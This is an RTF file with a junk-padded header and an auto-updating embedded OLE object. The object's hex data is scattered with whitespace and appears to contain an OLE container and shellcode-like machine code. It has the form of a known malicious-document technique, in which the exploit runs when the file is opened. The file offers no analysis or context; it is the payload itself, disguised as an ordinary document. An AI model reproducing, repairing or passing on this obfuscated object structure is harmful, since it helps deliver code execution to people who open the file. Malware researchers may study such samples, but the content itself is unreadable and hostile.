{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objautlink\objupdate\objw1376\objh9365{\*\objdata b25d0	c7502	0000 00	0d0	0000	0	6761	6635363 2 4e
3 8 7	8 367
4
3
1
0 000 0000 00000	000
000
0
1
00	000d
0
cf1 1
e 0
a 1
b1
1a
e1
0	0000	000	00000	00000	0	000	0000000	00
03	e0003
0	0fef	f 09
0006 00	000
000
0 0 000 0
00
00
00000
10000 00	010	00000
0	0000	0	0
0
0	01
0 0
0000
200 0 0	0001	0
0	00	00
f	eff	f
f ff
000
00	00	0	0 0000000ffffff ff	f	ff fff f	ffff	ff ff f ff fff	f
ffff	ff	f	f	f
ff
f
f
ffffffff fff
ff
f f ffff
f
f
fffffffff
ff
f
fff
f
f ff fffffff
ff ff	ff f ff fffffff	f	fffffff	fffff ffffff f ffffff ff
ff
f fffff f fff f	fff
fff	f
f	ff ff
ff	fff	ffff
f
ff
f
f
ffff ff
f
ffffff fffff f	f
ff
ffffffffff
fff
ffffffff f f
ffff	ffffff	fff fff
ff
f
ffffff
fff
ff fff
fff f f f	fff
f	f	ff
ffff
f	ffffff
fffffff	ffff
ff	ffff	ffff
f	ffff	ffff ff
ff
ffffff	f
ff	fffffff f ff fff fffffffff fffffffffffff f fff ffff	ffffff	fff	fffff fff
ff	ffff	f
ffffffffffffff	fff	f	ff	f	fff	fffffff	fff	f	ffffff
fff
f
f
ffffffff f	fffff	ffff ffff ff ff fffffff f	ff	f
ff	ff	ff
f	fffff
ff	ffff	ff f f ffffff
ff	ff
f f fffff
f f ffffff ff
f
f
fff ff f
fff
f ffffffffff ff	f	ffffffffff	ffffff
ff
f	f
ffffff
f
ff
fffffff	fff	f	fff f
ff	f
ffff ffff	f	ff
f
f	f	ff f fff
f f
ffff ff
ff
fff fffffff	fff	fffff ff f f ff f
f
ff	ff	ff
ffff
f
f	f ff f	fffffff	f	ff	ff
fff	f
f	f	f
ffff	ff fff
ffff f ff
ff ff	ff	fff
ff	fffffff	f	fff	ff
f
f	fffff
ff	f
f	ff	ff ffff	f	fff	fff f
fff fffff f fff
ff
f fffff
ff
f
ff	f
f
fff	ff	ffff	f
f ff fffff ffff f f fffff
f
ff
ffff ffff f
f ffffffff
fffffffff f f
fff	ff	ffffff	ffffffffff	fffffffff	d	f	f	fff
f
fe	ff f
ffffeffffff0400
0	0
0005 000000060 0	00 00fefff fff f fffff	fff
ff	ff	f	f
fff
ff
ffff	ffff fffffff
f f ff f ff f fffff fff ff	fffff	fffff
ff	f
ff f ff f ffff
fffff
f
f ff
f
f f f fff
ffff
ff fffffffffff f	fffff	ffff
fff	f ff
fffff
ff ffffff f	fffffff
f	ffff f	fffff
f	f
ff	f
ff	f f	fffff	f fff
fffffffffffff
f f f
ff f
f
f ffff	f	fffff ffffffff	fff
fffffff ff
ff fff	ff	fff
f	fff	fff f ff	ff f f ff ff
f
ff	ff f
f
fff
fff ff
fff	f	f ff f
f
f	f	f
f
f	f
f
f	ff	f ff ff
ffffffff ff f f fff	ff	fff	f
ffff	fffff	fff f
f	f
ffff
ff
f
f
f	ff	ff f f
f	ffffff	fffffffffffff	ff	f	f	fffffffffffffffff	fff
f
ff
fffff	f f
ff fffff
f ffffffff	f	f
fff
ff f
ff
f
fff f ffff	ffff
f
ffffff f
f ff ff ffff
f ff f
ff
ff
ff f	ffffffff
f ff	fffff
f
ff	f
f
ff	f	ff
fff
ff	f
f
ff
f	ff fffff ff f ff f f ffffff
f ffff f
f
fffff ff ff f fff	ffff	fffffffffffff f ff fff
ffff f fff fff
ffff
ff	ffff fffffffff
f fff
f ffff	f	f
fffff	f f fff ff	fffff f
ffffff	fffffffffffff	f	fff	ffff fffff f	fff	fff
fff	fff	ff	f	f	ffff fff ff
f	ff
ff	f
fff
fff ff ffff
f
f fff
f
f
f
f fffffff fffffff f
f f	f f ff
f ff	f	f
f	fff ff
ff ffff
ffff	ffff	ff	ff	f ff f ffff ff	ff ffffff f ff
f	ff ff	ff	f
f
ff	ff
fff
fff	fffff	ff f fffffff f	fff f f
ff f	f
fff ffff	fffffffffffffffffffff
fffffffffffffff ff f fffff ffffffff fff fffffff fffffff ff ffffffff f ff
f f
ffff
ff
fff
ff
ffffffffffff
fff
ffff f ff	f	f	fff
f
f fff ffff f	ff
f f	ff 52
0 0
6
f0
06
f007 4002 0 00
4
50 06	e00	740
072
0
07
9
0
0000000	0	0 000	000
00 0	000000 000000	0000
00	0 00
00
00 000
0	00 00	0
0
0	0000	000
0	0
0
000 000 00	00	0 000 000000000 0	01
6	00
0500ff	ffff ffff f f f ff	f0
10	000
0	00
2	c
e0	2	0000	00
0
0
00	c
000
000
0	00	0	0
0	0 4
6
00000 0 00 000 00 000 000000	00
b	0
fa4	717
fe21
d40103	0
0	00	0	04
0
0	70000
0	00000000	1004f00 6c00 65
0	0
3100
3	0004e0061 0 07400
69 0
076
0	0
6	5000 0 0 000 0
000 000000000	00	0 0000 000000000 0
00 0
00 00 00000 0
000
0 00 0 000 00000 0 00 0 0
00000
0 00 00
01a	0	0
02 01f
ff
ffffff ffffffff fff
ffff
000000 0	00
0
0000	00
0000	0000000 00 000000	0000000000000	000000	0000000 000 0000 000000	00 0000330700
0
00000
0 000 00	0	0 0 0000000	000	00 00 0	00	0 000000	0
00	00 000	00000	000	0	00000000000000	00000 0 0000	000	000000	0 00 00	0000	0	0000
000	00	00000000	0	0000	0 00 0 00 0 0
0000
0 0 0000	0
000	00
0fffff
fff	f
ff
f
fffffffffff
f
0
00
00
0000	0000	0	00	0	0000	000000000000000	0 000000000 0
00
00 00 0
000
000 0
0000000
0000
000
0 0
0
00 000 00 0000	0 00000 0 0000000	00	00000	00
0
000000	00	00
0 0 0 00 000
00 00000 0 0
0	00
0
0
00
0	0	0000000
0
00
0 00 00
0	00	0	0 0000 00000000 0	0000 00000 0	000	00 0 0 0000000 00 0000000000
0 000
0	0000
0	0
000f	ffff ff
fff	fffffff	ff
f
ff	ff
0000	00000 0 00
00 0000
00 000 0	000
00000000
00000000
0000
00000
00 0000 00
0 000 00000 0 00 00 00 00 0	00	000
00 00000 0000	0
01
000
0
0
00 2 0
0
0 0
0
0030
00	0
000
4
0000
000	5	0	0	0 000 060 0000 007 00000
0080 00	00	009	0
0 0 0000a00	00000b00	00	00	0c 00 0 00 0 0d0
000	0	00
e0	0 000	0	0	f
00 00001000
0 0 0
0 11 0 0
00001 2 0 00
00
013000000
14
0
0 00	00	150000	0
0
160	00000	1
70 00
000 1 800	00
00
19	00
0 000 1a0 00
000 1 b00000 01c 0	0	0
00
0f
e	ff fff ffff fff ff ffffff ffff	ffff	fffff
f	f fffff
ffff f
f
fff
ff ff	fff	fffff
f	f ffff
fff	f
fffff f
ff
ff	f
f	f	ff
fff	fffffffffff ff	ffff fff fff ff fffff	f
f	f	ffff	ff
ffff	f fff ffff fff fff fffffff ff ffffffff	fff	ffff
ffff
f
f
fff
ff f	fffffffffffff	f
ffff	fff
f	ff f
ffff ff ff fffffffffffffff ffff	f ffff ffff fff f ffffff fffffffffff
ff
f
ff
f ff fff	fffff
ffff	f	ffffff
ff
f	f	f	ff
f
f fff
ff ff
f
fff fffff
fff
ffff
fff f
f	f
f	f	f	ffffff f fffffffff
f ff ff	ff
f	ffff	fff	ff ff
fffffffff f
f
f
f
f
fff
fff fffff fffff ff fff	fffffffff	ffff	ff
ff
f	f
fff
fff
ffffff	f	fff
ff fffff	f	fff	f	ff	ffff	fffff
f
ffff
f
fffffff
f	f	ffff	fff
ffffff f f	ffff	f	ff	ffff	fffff	f	f f ffffff fffffffffff
f fffff	f fffff	f	ffff
ff ff ff	fff
fffffffffff
ff ffff ff fff f ff
f ff f
ffffff
f
fffffffff ffff
f
f ff fffff
ff ff fffff f fff ff
ff
f
ff
f fffff	fff ffff ff ffffff fff	fff	fff	ff ff f ffffffff fff fffffff	fffffff	ff	ffff ff	fff
f	fff
ff
ffffff fff f f fffff ff
ff f	fff
f	f	ff
fff	ff
fff
f
f
ff	ff	f	ff f
fff ff ff fff
fff	f	f ff ff	ff fff	ff	fff	ff	f f	ff	ffff	f
f	ff	ff2f0	7
0 000 0 3 77	015c4 4 0	a01084c	77b 94 e035b 9 c 81f172 b e1e9c8b0 9	8 b01be f2f77
e30 81e6b
d6
f	c 7 09	8b16	50f	fd2	05891
80
48c 0 570e8 fb73f f
e0
d
f
1e0f4
500
d5
b 66
4f1dc8598
a85a5	2d09fb6	1112	d	b	4 0 19
9
c d
3a1b5b0c4d0be8	76	d	cca52
3e4 7
891 b51
279	73	d	6e550a 8b 5 22aab 473a 38705f6	0	3	404532e99	3dd6e2	5	3	d	84e6a93	0edb083	043	5	88b8b9d2	b	a32c861db	4ec0f8	9707 d5d51 1d013	29e	4553	82e
1
8 5 be 40a
07a	3	11
6
0
4 9 53
7647	cf906d7	2	7cfa	ed4
7
5b
26	33	b0
b9
2
18	ce447d
b12ef ecd c2ebd3
a
19	a	3	6b	ccdea 19a41 c	069
2b
17
c5
c05	d6c	5f 11f b	2 2 0e	7	3f8 c45f 1b 7dbb9 1 d
b8f
9
fc3
34
3
1d68f8	30
b
27 088	4
2
a	0	850 234fc7
f	f27
c
5
d9c8e
97565c6	0
e6c e 3
e	9	2101
0	000ad180 1bf24962e2 5
f	43d37	1	65bb935 4e5d a5a 49
e0 1d 3
a42	78e
8a 3
a	a	2
d
7 c0 8e996862 2cacde96 46cf0e	ec	ed86
5ab1	5	b
3
1e12
0	2c	3
dc
b
a
aa16c8236
d e16
f45c 296
7
d 5aa3 29ed8e147
4efa379d9db8	948
a
895	6d5	cf2	0 160dc7 c
587b
fb a6
e
b	427
0ee	a7 27090 13	9	5fb	b220	3	89fc5	d8f9e543d63	a4a09c9	637e96 b2 1 d
a6 4f	2c
959fbba0c
13	2	c
8 8e 9 26 2
04
ca
4
7a5e7b99
b 23
069912f95c b632	7b
8
d
b
7
c	3	6	a	1c	c
f
174
3	b1
0d	3f71588
e	5 09
6c2c8a6c 882b e1 ccf4f
4f5868	49
6	80	0	85	2e
4	ef	c8 c
a 3d7
ba 9570	ae70adc2934f17 6 79a	d58615690067a37b9	1	134f61	501d f9fc448
a
64c4 f
f 1
2780
5
d0
6
6841e
10657
5
c
2 566
4	2
1	3 8c
4	6b8 19d 3a7aef1
ea 0c06b 3 d1ee
4
dd
1763
3	f	4 a91e21d 1fa	d 1000 6cbea	ad c26ad eb5	d	653	3d	51fa61e7 2f 1 0 795
0
81b8e4c6 99	665d2	2556e97	70	100
0
0 9c 535 0	5	30	5aa	4
30	00 0
05 3c
5
4 00	008	1ebc2	0 e00	0	05b9	c57
56	5	3
8
1c7 a e1	500 0 0	8
db 6
7a 3c
0 0
0
0	8 d9b 04
65000	081	c7eb0a	0	000	81 eb20	4 c0
0008dbe9e780 0005 b5e5f
9d585b9d	eb05e9d
7
0
0 0
0005eeb4	8
eb0
7e9e9	00	00
0
0e
b44e8
9
d
01000 0eb3	6589 c5681 c 6463 f 00008 1 e e 13
4c00
008 1c643 750000
5
e9
d5 feb 15eb0	7ebcf	e9	d00 0 000005b514e f3	c	3
10
6
e	9d3
00
0000e9	e90 0 0 0	0	0e	bedeb
c8	8 3
c
6
4c	ebb 5e 9d70
0 0000
9c5756 5 7 81efda37 00
00	8	1c	7ce	7	f0	0
0	0	5
f5e5
f5	75 f9d e b6
a 9c5
3
57538
d
bf
e2 50 000081c70
2 3
b0 0 0081eb	e	f	0	d0000908
d	b	b32
3c
0	0
0
05b	5f5b 9d
e9
8600	0	0
009c53	81c 3	c60f00 00eb0	6 62f7
63 7 8 a6 9f
8d
9b	ac34 0 0008 d9b095 e0 0008
1eb85110
00
05 b
9d	eb	289
c56
8	1ee
2	9
1d	000
08
1 ee
2 2
4d00 008
db	62	77d00005e9d8 d
8f77 fcfff feb2f	69	c0	87
0c
3a 7ae b3aeb4	6 e81affff ffe90effffffeb06 227bd4e0fc4 b8 db	e
89030
0
006b
c
0
0
0
e	96affffffe929ffff
ffe	90 1fff f	ffe903
ff	fff	fe
918fff	f	f	feb07	eb 17e918 ffff
ff83
c 60439fe
7	2b	2e	b
a8e	9d4	f
e
ffff5
750
e	b 8 7 5 e
c3d	d	149
b 3 c5
c	7c8d86
f7 6d527fff9	7c5eb0ae3d f 1497b	a7dc	0184dc	1	da8	ecd1c
327
2049ea5bc3
75ed84	0	d	f66f	e	1ce	1	c74f
b	1
368
483eb	3	2c
9
a
1b2 e2494	e6e	1	36
c
c	c0
d3	b7a	1f	68eb
975	7
cc1
8aec45
c
a3
17
6b	7	6 d 21
2
7e6 aa 2 2 939 6d
4 0b
7b
cafd0ee 389
c
ba
3 31a4 d976 b09 b
1
192bdcd1dc 25 74 e	0b 5bd d9bd09
0
068 f 8	65
a	21	f
d5	8	f0 dded9	ca9a2
9a8	b	3b725 8
d6	a	e44c	d9	33f3111a
1f
68	5d	d7
e0b5f	000
ad	7f	5
ab
50	c2	dbb6a c347e5 49d61 9	ef28	cc	1	7e7	0f4	8	4c3b	ad96f3	7 a1
8
48 16f fd0b4d8f
13f	269
da1a5	0 056ace86914 8
1	86
43b8946f	a6	c11	7a15c4	b	35
b8	10
0	ade7	b	0e	3	bc	59d	88b	962	2	4 8	c23b95e9d
e80
c6d
e	fbbb
4c8	8
e
2	d	7b57ec85	e
aa	5a
7
b0e5c	d	405	7	0cfd	72	98bfc	46bd	9	d
7a3
f	4
b	e5 2
3 227 f5 d2d4 5
4 b c 5c0f5	e
ca 8 175 0 2	3
75c82	2	7	e5151 5e aa7bf ea f5	f	2	52187f9ab cd0
75a5	1	50	10a
092e1	39
b 79
eb9	8a730e5dd	a	d7e13 b c de57 76 27
7	c	640 9fd90b ab77 2516
6e
b7a9 09 e 10ae
40167bc7
0057	fa39184b87	8a	9c d671292 b9	a86
5a 2 b3a 7060 8 c7	8	0
e	4f7 6 526dd6
0fd60 1
d
8d9 0 6c 0145	5c	d6	3	0
b86ce	9
3
3
5
d	d	93f0	a4	b4ae4ec65	c27	4	8	6 00 4
9
c20b4 b
34	3d8784 6633389	3	3508f	3	85b52359
12c	a
f1d
adc0
e
7f	4
f	a9	4b233 7ba 64 2c50 10d8d231 85f5 37ad
69b161 99 8 c6b bfac5034a 019	cda6	18c0	6341
722
1
98
97b17d006	0681f19 f79066 cc
fadc
c1
5 5931
f8
7
eebc
70351b
99	07
9
6	c c9bfe
1
2	c6b	376
31	9
c3
8	289d
3	7	1	9cd4	c
d	f	d7 d76c3
1e	7	4
84	5e	0adeb0	abb	2	e1689319d184127978 f fe	c3cb	a	3bb
57c4 78
1
7 105 e7 bb c6
e2d3 c9	2
c5c7d97bc
981
4	e9d5 546 251	16b8d
31
db 3a082	0	160
2d3	311b
bfb0
e
d2	372 0c
3 3b85d1ce 2 1
6a91 db
46 8f 0 5239ad0 9610	1fe4c	a fc 36 3 a 3
a9e25
d6 9 4
b61
1
e13 025
2	1d	d	f	0
0	8f3
e	d
9	2	e93ab	a 3 d64
1df 5
c
a	1 e3
7 8 52 b
a
8
e 3 d 84
3f
2	0b1e3	b	f7	a	0	d
d28
c ad	f 353	8 2
b	c
b614
0
48f 38a302 7 ae
93 6cedb 1ed5 f6cf9 7
79
4559dfcb8a	0 8 2	c
6 b	10e
9
f	e
1c0	e	f
b84850	c
f6
e77
910f5a3	9d
3db6	f	5dcad2	2018f beea5	369e4
f45b2f	3	88e8 909ec	a	9b	db	63f0 e6
23a 4d43 cfc33d4e 2 a 505	1	1bd b 5cae23 c b
d9bf4
f
8017 524 2837
c
c	0
1	39	f	12
e21296d
4a9b	85 30
cdc	3e2	6	0
fdf	e4 33	7f1 c66 f
79135c b773a 756 3a	b	2	254	b9
b
28
73
030
6a	1c3	94a4d0d
54b6	c6
5	5	4832	ef
814 7f440
9	b
e	a
07	a	c3d1d	94f15c7a b7	4c86	e	4b 3	f2
db565dc3
40
7	6d
4	b
a	90 84 0 70c
c6
64 ab9b12 67c20593 a1aed75cc 4 8e d2d1a1abd
e 3bd7 0 3f
6 6	0 3 0 b7 d	4	ba ee b 3 d4ceacb a45 40f
0f	6cb737	5	ccbdd0b682
90
8	4e	c
a4a	8	3d	f2387d3
e	3	21f2
91	66	51ce
d	8	6 09b1 ff9237 33 0e1 df11b c7 8 e 6a34dc 1733764	28248	fd05
0000
00000	0	0000
00	0
0
0	0
000000000000000000000 0 00
00	00	0
0000
0
000 0	000	0	0
000000000 0
000
0
000000
0000000000000 0 00 0
000
0
0
00000000
00 00
0
0
000 00000 000000	00	000	0000000000000000000000000000	000	000000000	0000	000	000 00	00
0
0 0000000 000 0000	0	000000000	0000000000	0000000000000	00000 0
0000 0
0
0
00000 00
00	0
00 0
0 00 0 0
0
0 0
00
00 0
0 0 000 0 000 00
000 000 0000 000 000 000000
000
00 00
0 0
0000 0	000	0 0 000000 0 0	0 00
0
0000
00	00
0 0
0000
00 0 000	000 00
0000 000000000
00 0 00 0000000 0000000 0000000000f36a0a 50 00	000	000}}}